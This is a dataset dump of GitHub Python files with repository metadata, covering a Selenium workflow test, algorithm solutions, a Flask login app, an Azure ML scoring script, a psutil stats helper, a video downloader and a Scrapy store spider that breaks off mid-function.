blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe1d3e30f4cdfd8651a3f9176b4620a6452e5d01
|
4a9995871447a406a7e6307a030503700cd41226
|
/script/testCase/Y3me项目/人力资源/薪资核算/审批流_定调薪.py
|
6a0c29d1fa8b09c17d7ae30c81a1f876d8ab676d
|
[] |
no_license
|
juntaoh1234/12122003
|
96a107ce22d930e8d9517810736d8f6ce92dc7ad
|
4bee39286c3708d7a0df3001e0daa9da51478170
|
refs/heads/master
| 2020-10-01T18:20:01.572599
| 2019-12-12T12:04:08
| 2019-12-12T12:04:08
| 227,596,967
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,960
|
py
|
# -*-CodeIng:utf-8 -*-
# @time :2019/10/31 20:02
# @author:HuangJunTao
# @email:1341890679@qq.com
# @file:审批流_薪资.py
# @SoftWare:PyCharm
from time import sleep
from SRC.common.decorator import codeException_dec
from SRC.unittest.case import TestCase
from SRC.webdriver.switchTo import SwitchTo
from script.common import utils
from selenium.webdriver import ActionChains
# UI automation case: create and publish a "set/adjust salary" (定调薪)
# approval-flow model under HR -> Payroll in the flow-model manager.
class EasyCase(TestCase):
    # Placeholder for a framework-level regular expression; unused in this case.
    str_regular = None

    def __init__(self, webDriver, paramsList):
        # Please do not modify this method 124421 (framework requirement)
        super(EasyCase, self).__init__(webDriver, paramsList)

    @codeException_dec('3')
    def runTest(self):
        """Walk the UI: open flow management, create a flow model named
        '定调薪流程', open the designer in a new window, configure the first
        node, save & publish, then return to the original window."""
        driver = self.getDriver()
        driver.implicitly_wait(30)
        param = self.param  # NOTE(review): param/tool appear unused below — framework convention?
        tool = utils
        driver.refresh()
        # driver.find_element_by_xpath('//*[@id="_dropdown_popcontainer"]/div/i').click()
        # driver.find_element_by_xpath('//*[@id="home_header"]//div[text()="UI测试专属"]').click()
        # driver.find_element_by_xpath(
        #     '//button[@class="u-button btn__style___37bsb u8c_primary__style___RFibc btn__style___20DQM "]').click()
        # sleep(2)
        # Open the top-left public-node menu
        driver.find_element_by_class_name('lebra-navbar-left-icon').click()
        sleep(2)
        # # Enter social collaboration
        # driver.find_element_by_xpath('//*[text()="数字化建模"]').click()
        # sleep(2)
        # Enter the first-level node: "流程管理" (flow management)
        menu2 = driver.find_element_by_css_selector('span[title="流程管理"]')
        actions = ActionChains(driver)
        actions.move_to_element(menu2)
        actions.click(menu2)
        actions.perform()
        sleep(1)
        # Enter the second-level node: "模型管理" (model management)
        driver.find_element_by_xpath('//li[@title="模型管理"]').click()
        sleep(1)
        # Switch into the model-management iframe
        iframe = driver.find_element_by_id('XTLCZX0006')
        # driver.switch_to.frame(iframe)
        SwitchTo(driver).frame(iframe)
        sleep(1)
        # Expand the left tree: "人力资源" (human resources)
        driver.find_element_by_xpath('//*[@id="app"]//span[text()="人力资源"]').click()
        sleep(1)
        # Expand the left tree: "薪资核算" (payroll accounting)
        driver.find_element_by_xpath('//*[@id="app"]//span[text()="薪资核算"]').click()
        sleep(1)
        wins0 = driver.window_handles  # NOTE(review): captured but never used
        # Select the "定调薪" (set/adjust salary) entry
        driver.find_element_by_xpath('//*[@id="app"]//span[text()="定调薪"]').click()
        # Click the "new" button
        driver.find_element_by_xpath('//div[@class="btns-wrapper"]//button[1]').click()
        sleep(2)
        # Enter the flow name
        driver.find_element_by_xpath('//label[text()="名称"]/following-sibling::div//input').send_keys('定调薪流程')
        # Remark / note field
        driver.find_element_by_xpath('//textarea').send_keys("备注信息0002")
        # Confirm the "new flow model" dialog
        driver.find_element_by_xpath(
            '//span[text()="新增流程模型"]/ancestor::div[@class="el-dialog__wrapper"]//button[2]').click()
        sleep(1)
        # Assert the "创建成功" (created successfully) toast is shown
        self.assertEqual("创建成功", driver.find_element_by_xpath('//p[text()="创建成功"]').text)
        # Click the "design" action on the newly created row
        driver.find_element_by_xpath(
            '//*[@id="app"]//table[@class="el-table__body"]/tbody/tr/td[4]/div/span[2]').click()
        # The designer opens in a new window; switch to it
        wins = driver.window_handles
        driver.switch_to_window(wins[-1])
        sleep(2)
        # Double-click the first node in the designer canvas
        # driver.find_element_by_xpath('//*[@id="app"]/div/div/div/div[1]/div[2]/button[2]').click()
        # driver.find_element_by_xpath('//span[@title="主管审批"]').doubleClick()
        driver.find_element_by_xpath('//div[@id="designer"]//div/span[1]/span').doubleClick()
        sleep(2)
        # Enter the flow-step name
        driver.find_element_by_xpath('//input[@placeholder="请输入流程环节名称"]').send_keys("提交")
        # Drag the scrollbar so the participant options become visible
        action = ActionChains(driver)
        ele = driver.find_element_by_xpath(
            '//*[@id="app"]/div/div/div/div[4]/div/div/div[2]/div[2]/div[1]/div/div[4]/div')
        action.drag_and_drop_by_offset(ele, 1, 110)
        action.perform()
        sleep(1)
        # Tick the flow-initiator option for this approval step
        driver.find_element_by_xpath(
            '//*[@id="app"]/div/div/div/div[4]/div/div/div[2]/div[2]/div[1]/div/div[2]/div[2]/div[2]/label[1]/span[2]').click()
        # Click save
        driver.find_element_by_xpath('//button[@class="yy-btn yy-btn-primary"]').click()
        # Click save-and-publish
        driver.find_element_by_xpath('//button[@class="right-run yy-btn yy-btn-primary"]').click()
        driver.close()
        # Switch back to the original window
        win1 = driver.window_handles
        driver.switch_to_window(win1[0])
        # Leave the iframe and close the opened tab entry in the header
        sleep(2)
        driver.switch_to.default_content()
        sleep(1)
        driver.find_element_by_xpath('//*[@id="home_header"]/div/div[3]/ul/li/div').click()
|
[
"1341890679@qq.com"
] |
1341890679@qq.com
|
17a92b1f3e8481c39a88bfcce5206a41d042f85e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03003/s061738428.py
|
e296bd1653a5eb16609ce574bdaa3369516bc4d2
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,199
|
py
|
#ABC130-E Common Subsequence
"""
Problem:
Given two integer sequences s (length n) and t (length m), count the pairs
of subsequences — the empty subsequence included — that are equal, mod 1e9+7.
Approach:
A "sum" variant of the LCS DP (sum instead of max); because this is a
counting problem, duplicates must not be double-counted.
With s seen up to position i and t seen up to position j:
dp0: totals after transitioning horizontally (j direction) first, then
     vertically (i direction)
dp1: totals after both vertical and horizontal transitions
dp1[-1][-1] is the answer.
"""
import sys
readline = sys.stdin.buffer.readline
def even(n): return 1 if n%2==0 else 0  # NOTE(review): helper is unused in this script
n,m = map(int,readline().split())
# Trailing sentinels: -1 and -2 never match any input value, nor each other.
s = list(map(int,readline().split())) + [-1]
t = list(map(int,readline().split())) + [-2]
mod = 10**9+7
#dp table (one extra row/column for the sentinel transitions)
dp0 = [[0]*(m+2) for _ in range(n+2)]
dp1 = [[0]*(m+2) for _ in range(n+2)]
dp0[0][0] = 1  # exactly one way to pick two empty subsequences
#process1: propagate counts; add dp1[i][j] to dp0[i+1][j+1] on a match
for i in range(n+1):
    for j in range(m+1):
        dp0[i+1][j] += dp0[i][j]%mod
        dp1[i][j] += dp0[i][j]%mod
        dp1[i][j+1] += dp1[i][j]%mod
        if s[i] == t[j]:
            dp0[i+1][j+1] += dp1[i][j]%mod
print(dp1[n][m]%mod)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
d6c44a3ffa12b15844a15eec93e1fb8552b1bdaa
|
c09decad4cb64b151913c25192eaa13348f63833
|
/228_middle_of_linked_list.py
|
a6d7fca7e7cbd173247de187ff3f6bccce225a7d
|
[] |
no_license
|
YI-DING/Lintcode
|
ef890e53282b9668064a7306329ecd0599dd114b
|
89a4cf703eb7a79bd62b6cc41f87242489692b88
|
refs/heads/master
| 2020-06-17T12:57:44.184391
| 2019-07-19T16:31:32
| 2019-07-19T16:31:32
| 195,931,377
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 563
|
py
|
"""
Definition of ListNode
class ListNode(object):
def __init__(self, val, next=None):
self.val = val
self.next = next
"""
class Solution:
    """
    @param head: the head of linked list.
    @return: a middle node of the linked list
    """
    def middleNode(self, head):
        # An empty list has no middle node.
        if head is None:
            return None
        # Classic two-pointer sweep: fast moves two links per step, slow one.
        # When fast cannot take another double step, slow sits on the middle
        # node (the first of the two middles for even-length lists).
        slow = head
        fast = head
        while fast.next and fast.next.next:
            slow = slow.next
            fast = fast.next.next
        return slow
|
[
"yiding1@uchicago.edu"
] |
yiding1@uchicago.edu
|
500fc4e6c97a72dc6703594efe00e2d77f4fdff6
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_201/1935.py
|
793ff52e55241fc12bc0b977c6c0e8c244a5f7aa
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,812
|
py
|
from itertools import groupby
import math
"""
I KNOW ITS SLOW BUT I WANTED TO TRY THIS SOLUTION ANYWAY
"""
FREE = False
OCCUPIED = True


def get_stall_value(stalls, stall_index):
    """Count the contiguous FREE stalls to the left and right of stall_index.

    Scans outward in each direction until an OCCUPIED stall stops the scan.
    Returns (left_free_space, right_free_space).
    """
    left = 0
    pos = stall_index - 1
    while stalls[pos] != OCCUPIED:
        left += 1
        pos -= 1
    right = 0
    pos = stall_index + 1
    while stalls[pos] != OCCUPIED:
        right += 1
        pos += 1
    return left, right


def go_into_next_stall(stalls):
    """Seat one person in the middle of the leftmost longest FREE run.

    Mutates `stalls` in place and returns (left_space, right_space) — the
    free stalls on each side of the chosen one.
    """
    # First pass: length of the longest run of FREE stalls.
    longest = 0
    for occupied, run in groupby(stalls):
        if occupied == FREE:
            longest = max(longest, len(list(run)))
    # Second pass: stop at the first FREE run of that length and pick its
    # middle (left-biased split for even-length runs).
    chosen = 0
    for occupied, run in groupby(stalls):
        size = len(list(run))
        if occupied == OCCUPIED or size != longest:
            chosen += size
        else:
            chosen += (size - 1) // 2
            left_space = math.ceil((size - 1) / 2)
            right_space = math.floor((size - 1) / 2)
            break
    stalls[chosen] = OCCUPIED
    return left_space, right_space


def get_values(nbr_stalls, nbr_people):
    """Simulate nbr_people entering nbr_stalls stalls one by one.

    The stall row is bracketed by OCCUPIED sentinels. Returns the
    (left, right) free-space values seen by the LAST person to enter.
    """
    stalls = [OCCUPIED] + [FREE] * nbr_stalls + [OCCUPIED]
    for _ in range(nbr_people):
        l_val, r_val = go_into_next_stall(stalls)
    return l_val, r_val
def main():
    """Read Code Jam style input: a case count, then one 'stalls people'
    pair per case; print the last person's left/right free-space values."""
    nbr_rows = int(input())
    for nbr_row in range(1, nbr_rows + 1):
        nbr_stalls, nbr_people = map(int, input().split())
        l_val, r_val = get_values(nbr_stalls, nbr_people)
        # Format kwarg is named nbr_rows but receives the 1-based case index.
        print("Case #{nbr_rows}: {l_val} {r_val}".format(
            nbr_rows=nbr_row, l_val=l_val, r_val=r_val))

if __name__ == "__main__":
    main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
aa358d4290d3d085e65216cf41db3ad6bfd413da
|
3888104cebd79de74f33dda628505b491e32be09
|
/lcs4.py
|
f5845eba44ced2722b53996fef018e3d81623f78
|
[] |
no_license
|
babiswas/Dynamic-Programming
|
788f7c35aa927228a728da6025657554487285f5
|
957e150577fd5bbccde33cb393c78dcad07860c1
|
refs/heads/master
| 2022-12-24T05:24:03.282098
| 2020-09-27T14:55:05
| 2020-09-27T14:55:05
| 299,054,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
def lcs(str1, str2, m, n, T):
    """Fill table T bottom-up and return the length of the longest common
    subsequence of str1[:m] and str2[:n].

    T must be at least (m+1) x (n+1); T[i][j] ends up holding the LCS
    length of str1[:i] and str2[:j].
    """
    # Base cases: an empty prefix on either side shares nothing.
    for i in range(m + 1):
        T[i][0] = 0
    for j in range(n + 1):
        T[0][j] = 0
    # Standard LCS recurrence.
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            if str1[i - 1] == str2[j - 1]:
                T[i][j] = 1 + T[i - 1][j - 1]
            else:
                T[i][j] = max(T[i - 1][j], T[i][j - 1])
    return T[m][n]
def lcs_util(str1, str2, m, n):
    """Allocate an (m+1) x (n+1) work table and delegate to lcs()."""
    table = [[-1] * (n + 1) for _ in range(m + 1)]
    return lcs(str1, str2, m, n, table)
if __name__=="__main__":
    # Demo: the LCS of "abcdgh" and "abedfhr" is "abdh" -> prints 4.
    print(lcs_util("abcdgh","abedfhr",len("abcdgh"),len("abedfhr")))
|
[
"noreply@github.com"
] |
babiswas.noreply@github.com
|
67f9eb131a4fe209142b2e9cde4c78e0d5898318
|
f0cddf6fb1b58f4e80e169eda4897a3ab864cd48
|
/login/app.py
|
aee1a989b6b7a52299d82633094ed169ca07511c
|
[] |
no_license
|
skrstv123/LEARNING-FLASK
|
8a3134bf2198051601a2ff8f92df8cd2a2ed7b90
|
2d3912fd251b763deb5f7f7468d9a5e79bf7ef4f
|
refs/heads/master
| 2022-12-10T19:06:28.623200
| 2020-01-19T20:08:28
| 2020-01-19T20:08:28
| 229,042,034
| 0
| 0
| null | 2022-12-08T03:27:21
| 2019-12-19T11:38:17
|
Python
|
UTF-8
|
Python
| false
| false
| 2,279
|
py
|
from myproject import app,db
from flask import render_template, redirect, request, url_for, flash,abort
from flask_login import login_user,login_required,logout_user
from myproject.models import User
from myproject.forms import LoginForm, RegistrationForm
from werkzeug.security import generate_password_hash, check_password_hash
@app.route('/')
def home():
    # Public landing page.
    return render_template('home.html')
@app.route('/welcome')
@login_required
def welcome_user():
    # Post-login landing page; @login_required bounces anonymous users.
    return render_template('welcome_user.html')
@app.route('/logout')
@login_required
def logout():
    # End the session and return to the public home page.
    logout_user()
    flash('You logged out!')
    return redirect(url_for('home'))
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Render the login form (GET) and authenticate the user (POST).

    On success, redirects to the page the user originally requested
    (Flask-Login's ``?next=`` parameter) or to the welcome page.
    """
    form = LoginForm()
    if form.validate_on_submit():
        # Grab the user from our User Models table
        user = User.query.filter_by(email=form.email.data).first()
        # Check that the user was supplied and the password is right.
        # check_password comes from the User model.
        if user is not None and user.check_password(form.password.data):
            # Log in the user
            login_user(user)
            flash('Logged in successfully.')
            # If a user was trying to visit a page that requires a login,
            # flask-login saves that URL as 'next'.
            # (renamed from `next`, which shadowed the builtin)
            next_page = request.args.get('next')
            # Follow only same-site relative paths. Falls back to the
            # welcome page when next is missing or empty (the old
            # next[0] check raised IndexError on ""), and rejects
            # protocol-relative '//host' URLs, which would otherwise be an
            # open redirect to an external site.
            if (not next_page or not next_page.startswith('/')
                    or next_page.startswith('//')):
                next_page = url_for('welcome_user')
            return redirect(next_page)
    return render_template('login.html', form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
    # Show the registration form (GET) or create the account (POST).
    form = RegistrationForm()
    if form.validate_on_submit():
        # NOTE(review): assumes the User model hashes `password` itself
        # (login uses user.check_password) — confirm in myproject.models.
        user = User(email=form.email.data,
                    username=form.username.data,
                    password=form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('Thanks for registering! Now you can login!')
        return redirect(url_for('login'))
    return render_template('register.html', form=form)
if __name__ == '__main__':
    # Development entry point only; serve via a WSGI server in production.
    app.run(debug=True)
|
[
"skrstv123@gmail.com"
] |
skrstv123@gmail.com
|
0ae899d23ae015fa404ce12fddaeb90360443dcc
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_374/ch26_2020_03_23_11_49_24_338094.py
|
cc35e8b2f881012697174064d14183bc52630ce9
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
# Simple loan-affordability check: read house price, salary and payback
# period, then compare the yearly installment against 30% of the salary.
val = int(input("Digite o valor da casa "))
sal = int(input("Digite o valor do seu salário"))
ano = int(input("Digite o tempo em anos que pretende pagar "))
calculo = (val/ano)  # yearly installment
# NOTE(review): the branches look inverted — an installment at or BELOW
# 30% of the salary prints "não aprovado" (not approved). Confirm the
# intended rule before relying on this output.
if calculo <= 0.3*sal:
    print("Empréstimo não aprovado")
else:
    print("Empréstimo aprovado")
|
[
"you@example.com"
] |
you@example.com
|
d194acc581ca1a2dabbfb09e565826189cda4fbc
|
1fe8d4133981e53e88abf633046060b56fae883e
|
/venv/lib/python3.8/site-packages/tensorflow 2/python/ops/array_ops.py
|
752790e486e2c8177d53c2e0e801774b2ff01fb4
|
[] |
no_license
|
Akira331/flask-cifar10
|
6c49db8485038731ce67d23f0972b9574746c7a7
|
283e7a2867c77d4b6aba7aea9013bf241d35d76c
|
refs/heads/master
| 2023-06-14T16:35:06.384755
| 2021-07-05T14:09:15
| 2021-07-05T14:09:15
| 382,864,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:c3fab6161a6ca581784be67954e7b9c2792e559bfc3a79286f79410909df8ec9
size 225087
|
[
"business030301@gmail.com"
] |
business030301@gmail.com
|
0eec7a8cf3a3e4a155feae3b08a5c930173d74bf
|
9452f681ea486fc53ad88d05392aed5fc450805c
|
/data_language_all/python/python_420.txt
|
f69fb14b5ec0f087ef9410f16cbb9d2d0193f595
|
[] |
no_license
|
CoryCollins/src-class
|
11a6df24f4bd150f6db96ad848d7bfcac152a695
|
f08a2dd917f740e05864f51ff4b994c368377f97
|
refs/heads/master
| 2023-08-17T11:53:28.754781
| 2021-09-27T21:13:23
| 2021-09-27T21:13:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,245
|
txt
|
#!/usr/bin/env python
__all__ = ['baomihua_download', 'baomihua_download_by_id']
from ..common import *
import urllib
def baomihua_download_by_id(id, title=None, output_dir='.', merge=True, info_only=False, **kwargs):
    """Resolve a baomihua flvid to its real CDN URL and download it.

    With info_only=True, only the stream information is printed.
    """
    api = 'http://play.baomihua.com/getvideourl.aspx?flvid=%s&devicetype=phone_app' % id
    html = get_html(api)
    # The API answers with url-encoded key=value pairs; pull out the parts
    # of the CDN URL. (file_type renamed from `type`, which shadowed the
    # builtin.)
    host = r1(r'host=([^&]*)', html)
    assert host
    file_type = r1(r'videofiletype=([^&]*)', html)
    assert file_type
    vid = r1(r'&stream_name=([^&]*)', html)
    assert vid
    dir_str = r1(r'&dir=([^&]*)', html).strip()
    url = "http://%s/%s/%s.%s" % (host, dir_str, vid, file_type)
    _, ext, size = url_info(url)
    print_info(site_info, title, file_type, size)
    if not info_only:
        download_urls([url], title, ext, size, output_dir, merge=merge)
def baomihua_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
    """Scrape a baomihua page for its title and flvid, then download by id."""
    page = get_html(url)
    title = r1(r'<title>(.*)</title>', page)
    assert title
    vid = r1(r'flvid\s*=\s*(\d+)', page)
    assert vid
    baomihua_download_by_id(vid, title, output_dir=output_dir, merge=merge, info_only=info_only)
# Module-level exports consumed by the surrounding downloader framework.
site_info = "baomihua.com"
download = baomihua_download
download_playlist = playlist_not_supported('baomihua')
|
[
"znsoft@163.com"
] |
znsoft@163.com
|
2db97a28852186e87dec880bb875aaf5529e8812
|
500bca3e22bd0c30c79b74918e9847742b3c428e
|
/sdk/python/jobs/pipelines/1j_pipeline_with_pipeline_component/nyc_taxi_data_regression_with_pipeline_component/train_pipeline/predict_src/predict.py
|
fde23606901aec040fa25345734e835f96c02c9f
|
[
"MIT"
] |
permissive
|
Azure/azureml-examples
|
2304c862fd2e36e6640ecc4d09f69c5ed93b48ab
|
e5f7b247d4753f115a8f7da30cbe25294f71f9d7
|
refs/heads/main
| 2023-08-31T00:10:14.107509
| 2023-08-30T17:29:22
| 2023-08-30T17:29:22
| 289,334,021
| 1,219
| 1,074
|
MIT
| 2023-09-14T16:00:55
| 2020-08-21T18:04:26
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,022
|
py
|
# Batch scoring step: load a trained model via MLflow, predict taxi-fare
# cost on the test split, and write predictions.csv next to the actuals.
import argparse
import pandas as pd
import os
from pathlib import Path
from sklearn.linear_model import LinearRegression
import mlflow

# Auto-log sklearn params/metrics to the active MLflow run.
mlflow.sklearn.autolog()

parser = argparse.ArgumentParser("predict")
parser.add_argument("--model_input", type=str, help="Path of input model")
parser.add_argument("--test_data", type=str, help="Path to test data")
parser.add_argument("--predictions", type=str, help="Path of predictions")

args = parser.parse_args()

print("hello scoring world...")

lines = [
    f"Model path: {args.model_input}",
    f"Test data path: {args.test_data}",
    f"Predictions path: {args.predictions}",
]

for line in lines:
    print(line)

# Load and split the test data
print("mounted_path files: ")
arr = os.listdir(args.test_data)
print(arr)

test_data = pd.read_csv(Path(args.test_data) / "test_data.csv")
testy = test_data["cost"]  # ground-truth target column
# testX = test_data.drop(['cost'], axis=1)
# Explicit feature columns (everything except 'cost').
testX = test_data[
    [
        "distance",
        "dropoff_latitude",
        "dropoff_longitude",
        "passengers",
        "pickup_latitude",
        "pickup_longitude",
        "store_forward",
        "vendor",
        "pickup_weekday",
        "pickup_month",
        "pickup_monthday",
        "pickup_hour",
        "pickup_minute",
        "pickup_second",
        "dropoff_weekday",
        "dropoff_month",
        "dropoff_monthday",
        "dropoff_hour",
        "dropoff_minute",
        "dropoff_second",
    ]
]
print(testX.shape)
print(testX.columns)

# Load the model from input port
model = mlflow.sklearn.load_model(args.model_input)

# Make predictions on testX data and record them in a column named predicted_cost
predictions = model.predict(testX)
testX["predicted_cost"] = predictions
print(testX.shape)

# Compare predictions to actuals (testy)
output_data = pd.DataFrame(testX)
output_data["actual_cost"] = testy

# Save the output data with feature columns, predicted cost, and actual cost in csv file
# NOTE(review): DataFrame.to_csv returns None, so output_data is rebound to
# None here; harmless since nothing uses it afterwards.
output_data = output_data.to_csv((Path(args.predictions) / "predictions.csv"))
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
a6b07925ad745b8be7937bfeb0c1c2786ded3dab
|
e87d793b3a5facc6e54e0263fbd67703e1fbb382
|
/duckietown-world-venv/lib/python3.6/site-packages/compmake/utils/system_stats.py
|
b91659969d09931f398a5f0c7b510618abb69b60
|
[] |
no_license
|
llingg/behaviour-benchmarking
|
a860bbe709309e13f3e1133d916944882199a40f
|
85bbf1a9c2c628ba74480fe7abac3804d6afdac4
|
refs/heads/v1
| 2022-10-06T08:21:29.068329
| 2020-06-11T07:02:46
| 2020-06-11T07:02:46
| 259,622,704
| 0
| 0
| null | 2020-06-02T17:52:46
| 2020-04-28T11:52:08
|
C++
|
UTF-8
|
Python
| false
| false
| 3,677
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
__all__ = [
'AvgSystemStats',
]
try:
import psutil # @UnusedImport
except ImportError:
from compmake import logger
logger.warning('Package "psutil" not found; load balancing '
'and system stats (CPU, MEM) not available.')
class AvgSystemStats(object):
    """ Collects average statistics about the system using psutil. """

    def __init__(self, interval, history_len):
        """
        :param interval: Collect statistics according to this interval.
        :param history_len: Use this many to compute avg/max statistics.
        """
        self.interval = interval
        self.history_len = history_len
        try:
            import psutil  # @UnresolvedImport @Reimport
        except:
            self._available = False
        else:
            self._available = True
            # interval=0 makes cpu_percent non-blocking (since-last-call value).
            self.cpu = Collect('cpu', lambda: psutil.cpu_percpercent(interval=0),
                               interval, history_len) if False else Collect(
                'cpu', lambda: psutil.cpu_percent(interval=0),
                interval, history_len)
            try:
                # new in 0.8
                psutil.virtual_memory().percent
                get_mem = lambda: psutil.virtual_memory().percent
            except:
                # pre-0.8 psutil API fallback
                get_mem = lambda: psutil.phymem_usage().percent
            self.mem = Collect('mem', get_mem, interval, history_len)
            try:
                # new in 0.8
                psutil.swap_memory().percent
                get_mem = lambda: psutil.swap_memory().percent
            except:
                # pre-0.8 psutil API fallback
                get_mem = lambda: psutil.virtmem_usage().percent
            self.swap_mem = Collect('swap', get_mem, interval, history_len)

    def avg_cpu_percent(self):
        """Average CPU usage (%) over the collected history."""
        self._check_available()
        return self.cpu.get_avg()

    def max_cpu_percent(self):
        """Maximum CPU usage (%) over the collected history."""
        self._check_available()
        return self.cpu.get_max()

    def avg_phymem_usage_percent(self):
        """Average physical-memory usage (%) over the collected history."""
        self._check_available()
        return self.mem.get_avg()

    def cur_phymem_usage_percent(self):
        """Most recent physical-memory usage (%)."""
        self._check_available()
        return self.mem.get_cur()

    def cur_virtmem_usage_percent(self):
        """Most recent swap usage (%)."""
        self._check_available()
        return self.swap_mem.get_cur()

    def available(self):
        """ returns false if psutil is not installed """
        return self._available

    def _check_available(self):
        """Raise ValueError if psutil could not be imported."""
        if not self._available:
            msg = 'Sorry, psutil not available.'
            raise ValueError(msg)
class Collect(object):
    """Samples a zero-argument callable at most once per `interval` seconds
    and keeps the most recent `history_len` values for min/max/avg queries.
    """

    def __init__(self, name, function, interval, history_len):
        self.name = name                # label (used only for debugging)
        self.function = function        # sampler: () -> number
        self.interval = interval        # minimum seconds between samples
        self.history_len = history_len  # size of the rolling window
        self.last_time = None           # wall-clock time of the last sample
        self.values = []                # recent samples, oldest first

    def get_cur(self):
        """Return the most recent value (sampling first if stale)."""
        self.update_if_necessary()
        return self.values[-1]

    def get_min(self):
        """Return the minimum over the kept history."""
        self.update_if_necessary()
        return min(self.values)

    def get_max(self):
        """Return the maximum over the kept history."""
        self.update_if_necessary()
        return max(self.values)

    def get_avg(self):
        """Return the arithmetic mean over the kept history."""
        self.update_if_necessary()
        return sum(self.values) * 1.0 / len(self.values)

    def update_if_necessary(self):
        """Take a new sample unless the last one is younger than `interval`."""
        if self.values and self.time_from_last() < self.interval:
            return
        self.values.append(self.function())
        self.last_time = time.time()
        # Drop the oldest sample once the window is full.
        if len(self.values) > self.history_len:
            del self.values[0]
        # print('%s: %s' % (self.name, self.values))

    def time_from_last(self):
        """Seconds since the last sample; 'very long ago' if never sampled."""
        if self.last_time is None:
            return self.interval * self.history_len * 2
        return time.time() - self.last_time
|
[
"linggl@student.ethz.ch"
] |
linggl@student.ethz.ch
|
02d1bcf15ae7ebbed8bbbdb8e3525273dfec8001
|
71acb7214efd91c0d327f6d8958e1798eadb4401
|
/locations/spiders/mediamarkt_be.py
|
237c2ef3f09038fd1a8b6bec4254303932a2be83
|
[
"CC0-1.0",
"MIT"
] |
permissive
|
alltheplaces/alltheplaces
|
21b9f8b4ace1352e52ae7b8f8825a930d2cb033e
|
1bcbb55cfcf06f2c714465570711f6e83f205c22
|
refs/heads/master
| 2023-08-30T19:45:35.098658
| 2023-08-30T17:51:54
| 2023-08-30T17:51:54
| 61,166,935
| 453
| 176
|
NOASSERTION
| 2023-09-14T17:16:40
| 2016-06-15T01:09:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,477
|
py
|
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from locations.hours import DAYS_FR, OpeningHours
from locations.structured_data_spider import StructuredDataSpider
class MediaMarktBESpider(CrawlSpider, StructuredDataSpider):
    # Crawls the MediaMarkt Belgium store-selection page and emits one item
    # per store, extracted from structured data via parse_sd.
    name = "media_markt_be"
    item_attributes = {"brand": "MediaMarkt", "brand_wikidata": "Q2381223"}
    start_urls = ["https://www.mediamarkt.be/fr/marketselection.html"]
    # Follow every store link in the market list into the SD parser.
    rules = [Rule(LinkExtractor(restrict_css=".all-markets-list"), callback="parse_sd")]

    def post_process_item(self, item, response, ld_data, **kwargs):
        """Refine the structured-data item: prefer the on-page store name
        and re-parse opening hours from the raw LD data."""
        name = response.xpath('//*[@id="my-market-content"]/h1/text()').get()
        if name:
            item["name"] = name
        opening_hours = self.parse_hours(ld_data)
        if opening_hours:
            item["opening_hours"] = opening_hours
        yield item

    @staticmethod
    def parse_hours(ld_data: dict):
